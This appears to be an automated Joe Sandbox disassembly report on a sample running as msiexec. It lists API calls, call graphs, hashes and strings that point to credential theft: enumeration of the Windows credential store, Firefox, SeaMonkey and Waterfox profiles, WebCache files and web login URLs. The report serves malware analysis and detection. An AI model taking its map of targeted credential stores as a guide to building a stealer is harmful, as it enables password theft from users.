                                                                                  • Part of subcall function 0040C3C3: RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,000000FF,?,?,?,?,00000000), ref: 0040C4FB
                                                                                • _wcslwr.MSVCRT ref: 0040C817
                                                                                  • Part of subcall function 0040C634: wcslen.MSVCRT ref: 0040C65F
                                                                                  • Part of subcall function 0040C634: memset.MSVCRT ref: 0040C6BF
                                                                                • wcslen.MSVCRT ref: 0040C82C
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.2645437609.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                                Similarity
                                                                                • API ID: memset$free$CacheEntryEnumFindValuewcschrwcslen$ErrorFirstLastNext_wcslwr_wcsupr
                                                                                • String ID: /$/$http://www.facebook.com/$https://login.yahoo.com/config/login$https://www.google.com/accounts/servicelogin
                                                                                • API String ID: 2936932814-4196376884
                                                                                • Opcode ID: 2e55d37c3c93c49036042ab263f5962c07f69a8f438a79de627d7f97dd271f33
                                                                                • Instruction ID: 5b72bd72183a146cc5fb8da473a5bce975bbff0c760a192580a28ed18ba85502
                                                                                • Opcode Fuzzy Hash: 2e55d37c3c93c49036042ab263f5962c07f69a8f438a79de627d7f97dd271f33
                                                                                • Instruction Fuzzy Hash: 42218272A00244A6CF10BB6A9C8589E7B68EF44744B10457BB804B7293D67CDE85DB9D

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 886 40bdb0-40bdce call 404363 889 40bf63-40bf6f call 40440c 886->889 890 40bdd4-40bddd 886->890 892 40bdee 890->892 893 40bddf-40bdec CredEnumerateW 890->893 894 40bdf0-40bdf2 892->894 893->894 894->889 896 40bdf8-40be18 call 40b2cc wcslen 894->896 899 40bf5d 896->899 900 40be1e-40be20 896->900 899->889 900->899 901 40be26-40be42 wcsncmp 900->901 902 40be48-40be77 call 40bd5d call 404423 901->902 903 40bf4e-40bf57 901->903 902->903 908 40be7d-40bea3 memset 902->908 903->899 903->900 909 40bea5 908->909 910 40bea7-40beea memcpy 908->910 909->910 911 40bf11-40bf2d wcschr 910->911 912 40beec-40bf06 call 40b2cc _wcsnicmp 910->912 913 40bf38-40bf48 LocalFree 911->913 914 40bf2f-40bf35 911->914 912->911 917 40bf08-40bf0e 912->917 913->903 914->913 917->911
                                                                                APIs
                                                                                  • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 00404398
                                                                                  • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043AC
                                                                                  • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043BF
                                                                                  • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043D3
                                                                                  • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043E7
                                                                                • CredEnumerateW.ADVAPI32(00000000,00000000,?,?,?,00000000,?), ref: 0040BDE9
                                                                                • wcslen.MSVCRT ref: 0040BE06
                                                                                • wcsncmp.MSVCRT ref: 0040BE38
                                                                                • memset.MSVCRT ref: 0040BE91
                                                                                • memcpy.MSVCRT(?,?,?,00000001,?,?,?,00000000,?), ref: 0040BEB2
                                                                                • _wcsnicmp.MSVCRT ref: 0040BEFC
                                                                                • wcschr.MSVCRT ref: 0040BF24
                                                                                • LocalFree.KERNEL32(?,?,?,?,00000001,?,?,?,00000000,?), ref: 0040BF48
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.2645437609.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                                Similarity
                                                                                • API ID: AddressProc$CredEnumerateFreeLocal_wcsnicmpmemcpymemsetwcschrwcslenwcsncmp
                                                                                • String ID:
                                                                                • API String ID: 697348961-0
                                                                                • Opcode ID: 4320d3521706fdf8c6ed48fb05be967b0956d3d4dbd01890db6896aba47bd834
                                                                                • Instruction ID: 79a9ca8399314c5bcb3e205da5602351372edcdcc58f79068602210d8f55f42f
                                                                                • Opcode Fuzzy Hash: 4320d3521706fdf8c6ed48fb05be967b0956d3d4dbd01890db6896aba47bd834
                                                                                • Instruction Fuzzy Hash: 1851E9B5D002099FCF20DFA5C8859AEBBF9FF48304F10452AE919F7251E734A9458F69
                                                                                APIs
                                                                                • memset.MSVCRT ref: 00403CBF
                                                                                • memset.MSVCRT ref: 00403CD4
                                                                                • memset.MSVCRT ref: 00403CE9
                                                                                • memset.MSVCRT ref: 00403CFE
                                                                                • memset.MSVCRT ref: 00403D13
                                                                                  • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                                                                  • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                                                                  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                  • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                  • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                  • Part of subcall function 0040414F: memset.MSVCRT ref: 00404172
                                                                                  • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041D6
                                                                                  • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041E7
                                                                                  • Part of subcall function 0040414F: memset.MSVCRT ref: 00404200
                                                                                  • Part of subcall function 0040414F: memset.MSVCRT ref: 00404215
                                                                                  • Part of subcall function 0040414F: _snwprintf.MSVCRT ref: 0040422F
                                                                                  • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 00404242
                                                                                • memset.MSVCRT ref: 00403DDA
                                                                                  • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                                                                  • Part of subcall function 004099C6: memcpy.MSVCRT(?,?,00000104,?,0040BAA5,00445FAE), ref: 004099E3
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.2645437609.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                                Similarity
                                                                                • API ID: memset$wcscpy$wcslen$_snwprintfmemcpywcscat
                                                                                • String ID: Waterfox$Waterfox\Profiles
                                                                                • API String ID: 1829478387-11920434
                                                                                • Opcode ID: fa7a89f4834ef8b5b40aee994800d4865c67d250ea9d7d7a0362dcd02f226988
                                                                                • Instruction ID: d72014143a293005b417e5222852f61d3cfc405123c5957a7e6d01a12b636873
                                                                                • Opcode Fuzzy Hash: fa7a89f4834ef8b5b40aee994800d4865c67d250ea9d7d7a0362dcd02f226988
                                                                                • Instruction Fuzzy Hash: 1E4133B294012C7ADB20EB56DC85ECF777CEF85314F1180ABB509B2181DA745B948FAA
                                                                                APIs
                                                                                • memset.MSVCRT ref: 00403E50
                                                                                • memset.MSVCRT ref: 00403E65
                                                                                • memset.MSVCRT ref: 00403E7A
                                                                                • memset.MSVCRT ref: 00403E8F
                                                                                • memset.MSVCRT ref: 00403EA4
                                                                                  • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                                                                  • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                                                                  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                  • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                  • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                  • Part of subcall function 0040414F: memset.MSVCRT ref: 00404172
                                                                                  • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041D6
                                                                                  • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041E7
                                                                                  • Part of subcall function 0040414F: memset.MSVCRT ref: 00404200
                                                                                  • Part of subcall function 0040414F: memset.MSVCRT ref: 00404215
                                                                                  • Part of subcall function 0040414F: _snwprintf.MSVCRT ref: 0040422F
                                                                                  • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 00404242
                                                                                • memset.MSVCRT ref: 00403F6B
                                                                                  • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                                                                  • Part of subcall function 004099C6: memcpy.MSVCRT(?,?,00000104,?,0040BAA5,00445FAE), ref: 004099E3
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.2645437609.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                                Similarity
                                                                                • API ID: memset$wcscpy$wcslen$_snwprintfmemcpywcscat
                                                                                • String ID: Mozilla\SeaMonkey$Mozilla\SeaMonkey\Profiles
                                                                                • API String ID: 1829478387-2068335096
                                                                                • Opcode ID: 4e0f951fde323d6a6ece029bc301e1d43e2d4c472937678d86f27e99a49f71a6
                                                                                • Instruction ID: badb9319ce56d3a3e0b5d4601891faab39f88fc9b3936f94b46873e2979bc7df
                                                                                • Opcode Fuzzy Hash: 4e0f951fde323d6a6ece029bc301e1d43e2d4c472937678d86f27e99a49f71a6
                                                                                • Instruction Fuzzy Hash: F94133B294012CBADB20EB56DC85FCF777CAF85314F1180A7B509F2181DA785B848F6A
                                                                                APIs
                                                                                • memset.MSVCRT ref: 00403FE1
                                                                                • memset.MSVCRT ref: 00403FF6
                                                                                • memset.MSVCRT ref: 0040400B
                                                                                • memset.MSVCRT ref: 00404020
                                                                                • memset.MSVCRT ref: 00404035
                                                                                  • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                                                                  • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                                                                  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                  • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                  • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                  • Part of subcall function 0040414F: memset.MSVCRT ref: 00404172
                                                                                  • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041D6
                                                                                  • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041E7
                                                                                  • Part of subcall function 0040414F: memset.MSVCRT ref: 00404200
                                                                                  • Part of subcall function 0040414F: memset.MSVCRT ref: 00404215
                                                                                  • Part of subcall function 0040414F: _snwprintf.MSVCRT ref: 0040422F
                                                                                  • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 00404242
                                                                                • memset.MSVCRT ref: 004040FC
                                                                                  • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                                                                  • Part of subcall function 004099C6: memcpy.MSVCRT(?,?,00000104,?,0040BAA5,00445FAE), ref: 004099E3
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.2645437609.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                                Similarity
                                                                                • API ID: memset$wcscpy$wcslen$_snwprintfmemcpywcscat
                                                                                • String ID: Mozilla\Firefox$Mozilla\Firefox\Profiles
                                                                                • API String ID: 1829478387-3369679110
                                                                                • Opcode ID: e8b210b2701fced3ec1563677da70e7bdaed7d27e85ea88c95246b73557c45d8
                                                                                • Instruction ID: a33c26704871042caa7cb74448a1974e70df039046fe21947f04a6d8cbe9f93a
                                                                                • Opcode Fuzzy Hash: e8b210b2701fced3ec1563677da70e7bdaed7d27e85ea88c95246b73557c45d8
                                                                                • Instruction Fuzzy Hash: 354134B294012CBADB20EB56DC85ECF777CAF85314F1180A7B509B3181EA745B948F6A
                                                                                APIs
                                                                                • memcpy.MSVCRT(00000048,00451D40,0000002C,000003FF,00445FAE,?,00000000,?,0040B879), ref: 004444E3
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.2645437609.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                                Similarity
                                                                                • API ID: memcpy
                                                                                • String ID: BINARY$NOCASE$RTRIM$main$no such vfs: %s$temp
                                                                                • API String ID: 3510742995-2641926074
                                                                                • Opcode ID: 821e0fdd347fba4e0959882d1eed221cd0f9849de050a87fd0c537b7ccc40074
                                                                                • Instruction ID: 565814064bb2237b40e40c3ad6633df45ffc5137317807aec9a32ad89077b3bf
                                                                                • Opcode Fuzzy Hash: 821e0fdd347fba4e0959882d1eed221cd0f9849de050a87fd0c537b7ccc40074
                                                                                • Instruction Fuzzy Hash: BA7119B1600701BFE710AF16CC81B66B7A8BB85319F11452FF4189B742D7BDED908B99
                                                                                APIs
                                                                                • CreateFileW.KERNELBASE(?,-7FBE829D,00000003,00000000,?,?,00000000), ref: 00418457
                                                                                • GetLastError.KERNEL32 ref: 0041847E
                                                                                • free.MSVCRT ref: 0041848B
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.2645437609.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                                Similarity
                                                                                • API ID: CreateErrorFileLastfree
                                                                                • String ID: |A
                                                                                • API String ID: 981974120-1717621600
                                                                                • Opcode ID: b73738cfafb11dafaf653c45b8d30767a4f0487cb759c2014a2d8a4f30590433
                                                                                • Instruction ID: 73005d91fce95ddd83c4435d1527c7398ec28b7193468e33704956b81d718a95
                                                                                • Opcode Fuzzy Hash: b73738cfafb11dafaf653c45b8d30767a4f0487cb759c2014a2d8a4f30590433
                                                                                • Instruction Fuzzy Hash: 50412472508306AFD710CF25DC4179BBBE5FF84328F14492EF8A492290EB78D9448B96
                                                                                APIs
                                                                                  • Part of subcall function 0040B633: free.MSVCRT ref: 0040B63A
                                                                                  • Part of subcall function 0044553B: memset.MSVCRT ref: 004455C2
                                                                                  • Part of subcall function 0044553B: wcsrchr.MSVCRT ref: 004455DA
                                                                                • memset.MSVCRT ref: 004033B7
                                                                                • memcpy.MSVCRT(?,00000000,0000121C), ref: 004033D0
                                                                                • wcscmp.MSVCRT ref: 004033FC
                                                                                • _wcsicmp.MSVCRT ref: 00403439
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.2645437609.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                                Similarity
                                                                                • API ID: memset$_wcsicmpfreememcpywcscmpwcsrchr
                                                                                • String ID: $0.@
                                                                                • API String ID: 2758756878-1896041820
                                                                                • Opcode ID: f66ff37cfebf4588bd42dffc34473b3fc2588101413319c72ad25ea5b69c0f44
                                                                                • Instruction ID: ab192eb15c9642abc1a13bae453f9d52c7669558764b377fc560e22e349fc473
                                                                                • Opcode Fuzzy Hash: f66ff37cfebf4588bd42dffc34473b3fc2588101413319c72ad25ea5b69c0f44
                                                                                • Instruction Fuzzy Hash: 6B414A71A0C3819BD770EF65C885A8BB7E8AF86314F004D2FE48C97681DB3899458B5B
                                                                                APIs
                                                                                  • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                  • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                                                  • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                  • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                  • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                                                  • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                                                • GetProcAddress.KERNEL32(00000000,00000000), ref: 004449E7
                                                                                • GetProcAddress.KERNEL32(00000000,00000000), ref: 004449F8
                                                                                • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A09
                                                                                • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A1A
                                                                                • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A2B
                                                                                • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A3C
                                                                                • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A4D
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.2645437609.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                                Similarity
                                                                                • API ID: AddressProc$LibraryLoad$DirectorySystemmemsetwcscatwcscpy
                                                                                • String ID:
                                                                                • API String ID: 2941347001-0
                                                                                • Opcode ID: 887775328fc4d7656a99cf0210b1f43b8bf028f74b4fef276dc7ab680041333b
                                                                                • Instruction ID: 45112ec7679d7541be2eaee67b01953ccf91f0241e5cd71b41190719d78dca83
                                                                                • Opcode Fuzzy Hash: 887775328fc4d7656a99cf0210b1f43b8bf028f74b4fef276dc7ab680041333b
                                                                                • Instruction Fuzzy Hash: 2E115871840700EDEA207F72DD0FF2B7AA5EF40B14F10882EF555594E1EBB6A8119E9C
                                                                                APIs
                                                                                • memset.MSVCRT ref: 00403C09
                                                                                • memset.MSVCRT ref: 00403C1E
                                                                                  • Part of subcall function 00409719: wcslen.MSVCRT ref: 0040971A
                                                                                  • Part of subcall function 00409719: wcscat.MSVCRT ref: 00409732
                                                                                • wcscat.MSVCRT ref: 00403C47
                                                                                  • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                                                                  • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                                                                • wcscat.MSVCRT ref: 00403C70
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.2645437609.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                                Similarity
                                                                                • API ID: memsetwcscat$wcscpywcslen
                                                                                • String ID: Mozilla\Firefox\Profiles$Mozilla\Profiles
                                                                                • API String ID: 2489821370-1174173950
                                                                                • Opcode ID: 5af024c53119846c6cf23d5d39710aba0b9f01952ad673d04fbaa3fd9d46c714
                                                                                • Instruction ID: 5219a381a5be6f9fff484f4b9c8ff18b49dc44b18064e24db21ac924a7a96902
                                                                                • Opcode Fuzzy Hash: 5af024c53119846c6cf23d5d39710aba0b9f01952ad673d04fbaa3fd9d46c714
                                                                                • Instruction Fuzzy Hash: 4401A9B294032C76DB207B669C86ECF672C9F45358F01447FB504B7182D9785E844AA9
                                                                                APIs
                                                                                • memset.MSVCRT ref: 0040A824
                                                                                • GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                                                • wcscpy.MSVCRT ref: 0040A854
                                                                                • wcscat.MSVCRT ref: 0040A86A
                                                                                • LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                                                • LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.2645437609.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                                Similarity
                                                                                • API ID: LibraryLoad$DirectorySystemmemsetwcscatwcscpy
                                                                                • String ID:
                                                                                • API String ID: 669240632-0
                                                                                • Opcode ID: 82c8cf326d92d3b179650df20de3df9a559229a48382c0fcbe0adb46b34a8860
                                                                                • Instruction ID: 21688b76284891f368be2c5f4feed5723597baa153f24eadc702144372ba9d0b
                                                                                • Opcode Fuzzy Hash: 82c8cf326d92d3b179650df20de3df9a559229a48382c0fcbe0adb46b34a8860
                                                                                • Instruction Fuzzy Hash: A6F0A472D0022467DF207B65AC46B8A3B6CBF01754F008072F908B71D2EB789A55CFDA
                                                                                APIs
                                                                                • wcschr.MSVCRT ref: 00414458
                                                                                • _snwprintf.MSVCRT ref: 0041447D
                                                                                • WritePrivateProfileStringW.KERNEL32(?,?,?,?), ref: 0041449B
                                                                                • GetPrivateProfileStringW.KERNEL32(?,?,?,?,?,?), ref: 004144B3
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.2645437609.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                                Similarity
                                                                                • API ID: PrivateProfileString$Write_snwprintfwcschr
                                                                                • String ID: "%s"
                                                                                • API String ID: 1343145685-3297466227
                                                                                • Opcode ID: 946b4c1fd7f9a1c82d4bd3564eada2d63785a77446bf9af388738d4a416c1506
                                                                                • Instruction ID: 05c1b6e2b8d8aed92df8b5d38884bf02313f678dea9e3ece4dcd1a0b753c0483
                                                                                • Opcode Fuzzy Hash: 946b4c1fd7f9a1c82d4bd3564eada2d63785a77446bf9af388738d4a416c1506
                                                                                • Instruction Fuzzy Hash: 7201AD3240421ABBEF219F81DC09FDB3F6AFF09305F14806ABA08501A1D339C5A5EB58
                                                                                APIs
                                                                                • GetModuleHandleW.KERNEL32(kernel32.dll,?,00413EA2,?,?,?,?,?,00000000,?), ref: 00413CB5
                                                                                • GetProcAddress.KERNEL32(00000000,GetProcessTimes), ref: 00413CCF
                                                                                • GetProcessTimes.KERNELBASE(00000000,?,?,?,?,?,00413EA2,?,?,?,?,?,00000000,?), ref: 00413CF2
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.2645437609.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                                Similarity
                                                                                • API ID: AddressHandleModuleProcProcessTimes
                                                                                • String ID: GetProcessTimes$kernel32.dll
                                                                                • API String ID: 1714573020-3385500049
                                                                                • Opcode ID: 3d2a63fc8b7889f90c1cc675bbb66959c3424aca663c91e440c9d47c6094dacc
                                                                                • Instruction ID: 0a9fc9a7fb2a98cd878f934f387e3824ef844cc6c25aa3dbb33b58617c33e237
                                                                                • Opcode Fuzzy Hash: 3d2a63fc8b7889f90c1cc675bbb66959c3424aca663c91e440c9d47c6094dacc
                                                                                • Instruction Fuzzy Hash: F5F03036204309AFEF008FA6FD06B963BA8BB04742F044066FA0CD1561D7B5D6B0EF99
                                                                                APIs
                                                                                • memset.MSVCRT ref: 004087D6
                                                                                  • Part of subcall function 0040A6E6: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,000003FF,000000FF,00000000,000003FF,00000000,00000000,0040B866,00445FAE,?,?,?,?,?,?), ref: 0040A6FF
                                                                                  • Part of subcall function 004095D9: memset.MSVCRT ref: 004095FC
                                                                                • memset.MSVCRT ref: 00408828
                                                                                • memset.MSVCRT ref: 00408840
                                                                                • memset.MSVCRT ref: 00408858
                                                                                • memset.MSVCRT ref: 00408870
                                                                                • memset.MSVCRT ref: 00408888
                                                                                  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                  • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                  • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                  • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.2645437609.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                                Similarity
                                                                                • API ID: memset$wcslen$AttributesByteCharFileMultiWidewcscatwcscpy
                                                                                • String ID:
                                                                                • API String ID: 2911713577-0
                                                                                • Opcode ID: 01acc2a10158501d086df2ecf85720ba35c535a6b148720ad12018c66e71fd5d
                                                                                • Instruction ID: a7e5ca25de4111a2a05fe91eb9e7b9268c7acadad77a1a504b595fc773a76dc1
                                                                                • Opcode Fuzzy Hash: 01acc2a10158501d086df2ecf85720ba35c535a6b148720ad12018c66e71fd5d
                                                                                • Instruction Fuzzy Hash: BD5146B280011D7EEB50E751DC46EEF776CDF05318F0040BEB948B6182EA745F948BA9
                                                                                APIs
                                                                                • memcmp.MSVCRT(?,?,00000004,?,00000065,004381DF,00000065,00000000,00000007,?,00000000), ref: 0041F202
                                                                                • memcmp.MSVCRT(?,SQLite format 3,00000010,?,00000065,004381DF,00000065,00000000), ref: 0041F22D
                                                                                • memcmp.MSVCRT(?,@ ,00000003,?,?,00000065,004381DF,00000065,00000000), ref: 0041F299
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.2645437609.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                                Similarity
                                                                                • API ID: memcmp
                                                                                • String ID: @ $SQLite format 3
                                                                                • API String ID: 1475443563-3708268960
                                                                                • Opcode ID: 82854fe69cd6f085c01fb16587ca6c24c159481fbb1fdb23c3f30c43337b22d0
                                                                                • Instruction ID: a5e199d7c3355b23248e204991ed7883f9cb1cefd3641e4a8180bf992d12f390
                                                                                • Opcode Fuzzy Hash: 82854fe69cd6f085c01fb16587ca6c24c159481fbb1fdb23c3f30c43337b22d0
                                                                                • Instruction Fuzzy Hash: 9051C1719002199BDF10DFA9C4817DEB7F4AF44314F1541AAEC14EB246E778EA8ACB88
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.2645437609.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                                Similarity
                                                                                • API ID: _wcsicmpqsort
                                                                                • String ID: /nosort$/sort
                                                                                • API String ID: 1579243037-1578091866
                                                                                • Opcode ID: 82532bcf7625f57df0476c9ea77f38d24af0b860564a5aebd85b14b7cf50dee8
                                                                                • Instruction ID: 59a4a6edbc2c6816dd96362f3638b70d105e8990563e463c72bda517b6347aa4
                                                                                • Opcode Fuzzy Hash: 82532bcf7625f57df0476c9ea77f38d24af0b860564a5aebd85b14b7cf50dee8
                                                                                • Instruction Fuzzy Hash: C8213770700201AFD714FB36C880E96F3AAFF58314F11012EE61897692DB39BC918B4A
                                                                                APIs
                                                                                • memset.MSVCRT ref: 0040E60F
                                                                                • memset.MSVCRT ref: 0040E629
                                                                                  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                  • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                  • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                  • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                Strings
                                                                                • Microsoft\Windows\WebCache\WebCacheV24.dat, xrefs: 0040E66F
                                                                                • Microsoft\Windows\WebCache\WebCacheV01.dat, xrefs: 0040E647
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.2645437609.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                                Similarity
                                                                                • API ID: memsetwcslen$AttributesFilewcscatwcscpy
                                                                                • String ID: Microsoft\Windows\WebCache\WebCacheV01.dat$Microsoft\Windows\WebCache\WebCacheV24.dat
                                                                                • API String ID: 3354267031-2114579845
                                                                                • Opcode ID: 74f633d4b8b79b581db03fb52a9a183d925aa75474fb6f674f7548ec87be104c
                                                                                • Instruction ID: 2f29c334d396001d9fe1cebc89c879271eb53039ccc8e03d5a3365d75131e7c5
                                                                                • Opcode Fuzzy Hash: 74f633d4b8b79b581db03fb52a9a183d925aa75474fb6f674f7548ec87be104c
                                                                                • Instruction Fuzzy Hash: 66118AB3D4012C66EB10E755EC85FDB73ACAF14319F1408B7B904F11C2E6B89F984998
                                                                                APIs
                                                                                Strings
                                                                                • only a single result allowed for a SELECT that is part of an expression, xrefs: 0043AAD3
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.2645437609.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                                Similarity
                                                                                • API ID: memset
                                                                                • String ID: only a single result allowed for a SELECT that is part of an expression
